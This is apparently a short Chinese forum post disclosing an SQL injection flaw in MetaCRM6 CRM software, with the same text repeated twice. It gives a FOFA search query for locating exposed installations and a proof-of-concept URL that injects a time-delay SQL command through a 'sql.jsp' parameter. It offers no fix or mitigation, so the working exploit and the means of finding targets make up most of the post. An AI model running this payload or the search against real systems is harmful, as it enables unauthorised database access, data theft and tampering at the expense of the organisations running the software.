攻击者可通过该漏洞执行任意SQL语句,可能获取数据库敏感信息(如用户数据、配置信息等),甚至篡改或删除数据,对系统安全性和数据完整性构成严重威胁。
fofa:product="美特软件-MetaCRM6"
漏洞复现
POC
/common/jsp/sql.jsp?sql=;waitfor%20delay%20'0:0:3'--
攻击者可通过该漏洞执行任意SQL语句,可能获取数据库敏感信息(如用户数据、配置信息等),甚至篡改或删除数据,对系统安全性和数据完整性构成严重威胁。
fofa:product="美特软件-MetaCRM6"
漏洞复现
POC
/common/jsp/sql.jsp?sql=;waitfor%20delay%20'0:0:3'--
没有回复内容